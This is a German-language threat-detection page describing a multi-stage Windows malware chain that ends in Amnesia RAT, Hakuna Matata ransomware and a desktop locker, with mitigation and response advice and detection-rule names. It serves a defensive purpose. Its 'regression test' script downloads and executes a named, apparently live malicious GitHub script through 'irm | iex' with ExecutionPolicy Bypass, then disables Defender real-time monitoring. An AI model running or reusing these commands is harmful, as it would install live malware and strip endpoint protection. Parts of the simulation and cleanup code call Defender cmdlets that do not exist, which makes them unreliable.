Ein genauer Blick auf eine mehrstufige Windows-Malware-Operation
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
FortiGuard Labs identifizierte eine mehrstufige Windows-Einbruchskette, die mit einer bösartigen LNK-Datei beginnt, die innerhalb eines komprimierten Archivs bereitgestellt wird. Die Verknüpfung startet einen ersten PowerShell-Loader, der nachfolgende Skripte von GitHub abruft und später die Kontrolle an einen verschleierten VBScript-Orchestrator übergibt. Der Workflow versucht dann, die Endpunktabwehr zu schwächen, indem er Microsoft Defender deaktiviert, das Defendnot-Dienstprogramm bereitstellt und sowohl Amnesia RAT als auch Hakuna Matata Ransomware bereitstellt. Der Vorgang endet mit dem Ablegen einer WinLocker-Komponente, die den Desktop sperrt, um die Wiederherstellung zu stören und Opfer unter Druck zu setzen.
Untersuchung
Ermittler rekonstruierten den Ausführungsweg von der durch LNK ausgelösten PowerShell-Phase zu einem VBScript, das Nutzdaten im Speicher wiederherstellt, was schließlich zur Bereitstellung von Ransomware und Desktop-Sperrverhalten führt. Abwehrmaßnahmen wurden durch gezielte Registry-Änderungen und durch das Injizieren einer Defendnot-DLL in Taskmgr.exe umgangen. Persistenz wurde durch eine Kombination von Run-Key-Einträgen und Startup-Ordner-Artefakten implementiert, um die Kette nach der Anmeldung erneut auszulösen.
Abschwächung
Überwachen Sie auf verdächtige registrybasierte Richtlinienänderungen unter HKLMSOFTWAREPoliciesMicrosoftWindows Defender und HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies. Blockieren Sie den Egress zu bekannten bösartigen GitHub- und Dropbox-URLs, die zum Staging verwendet werden, und alarmieren Sie bei PowerShell-Download-und-Execute-Mustern, die von LNK-Starts ausgehen. Setzen Sie Anwendungs-Whitelisting durch und verschärfen Sie die PowerShell-Ausführungsrichtlinien, um skriptbasierte anfängliche Zugriffe zu reduzieren.
Reaktion
Wenn erkannt, isolieren Sie den Endpunkt, stellen die Defender-bezogenen Registry-Einstellungen in einen bekannten guten Zustand wieder her und entfernen bösartige Dateien und Persistenzeinträge. Suchen Sie nach aktiven Amnesia RAT Prozessen und assoziierter Netzwerkaktivität und überprüfen Sie, ob Ransomware-Ausführung stattgefunden hat. Führen Sie eine vollständige forensische Untersuchung durch, um den Umfang des Schadens zu bestimmen und Überreste zu beseitigen, dann stellen Sie Systeme von sauberen Backups wieder her, wo dies möglich ist.
Angriffsablauf
Erkennungen
Verdächtiger Prozess verwendet eine URL in der Befehlszeile (via cmdline)
Ansehen
Deaktivieren der Echtzeitüberwachung und anderer Einstellungen von Windows Defender (via cmdline)
Ansehen
IOCs (HashSha256) zur Erkennung: In einer mehrstufigen Windows-Malware-Kampagne
Ansehen
Bösartiger Netzwerkverkehr und C2 über GitHub, Dropbox, Telegram [Windows-Netzwerkverbindung]
Ansehen
Windows-Malware-Kampagne PowerShell-Ausführung [Windows PowerShell]
Ansehen
PowerShell- und CMD-Ausführung mit Install.exe Täuschung [Windows-Prozesserstellung]
Ansehen
Simulation Execution
Voraussetzung: Der Telemetrie- & Baseline-Pre-Flight-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die dazu bestimmt ist, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle:
Ein Angreifer, der anfänglichen Zugriff auf den Endpunkt erlangt hat, möchte eine bösartige PowerShell-Nutzlast herunterladen und ausführen, während er die Standardeinstellung der Ausführungsrichtlinie umgeht. Sie nutzenInvoke-Expression(iex) kombiniert mitInvoke-WebRequest(irm) um ein Skript von einer entfernten GitHub-Raw-URL abzurufen und es unter-ExecutionPolicy Bypassausführen zu lassen. Nach der Einrichtung der Persistenz deaktivieren sie die Echtzeitüberwachung von Windows Defender, um die Erkennung der nachfolgenden Nutzlasten zu vermeiden. Diese Schritte erzeugen direkt die Befehlszeilen-Strings, für die die Sigma-Regel überwacht. -
Regressionstest-Skript:
# -------------------------------------------------------------- # Schritt 1 – Führen Sie das Remote-Skript mit ExecutionPolicy Bypass aus # -------------------------------------------------------------- $maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1" powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex" # -------------------------------------------------------------- # Schritt 2 – Deaktivieren Sie die Echtzeitüberwachung von Windows Defender # -------------------------------------------------------------- # Deaktivieren Sie den Echtzeitschutz Disable-MpPreference -DisableRealtimeMonitoring $true # Eine Ausschlusspfad hinzufügen (simuliert) Add-MpPreference -ExclusionPath "C:TempExcludeFolder" -
Aufräumbefehle:
# Reaktivieren Sie die Echtzeitüberwachung von Windows Defender Enable-MpPreference -DisableRealtimeMonitoring $false # Entfernen Sie den Ausschlusspfad (falls vorhanden) Remove-MpPreference -ExclusionPath "C:TempExcludeFolder" -ErrorAction SilentlyContinue # Stoppen Sie alle verbleibenden PowerShell-Prozesse, die vom Skript gestartet wurden Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'kira.ps1'} | Stop-Process -Force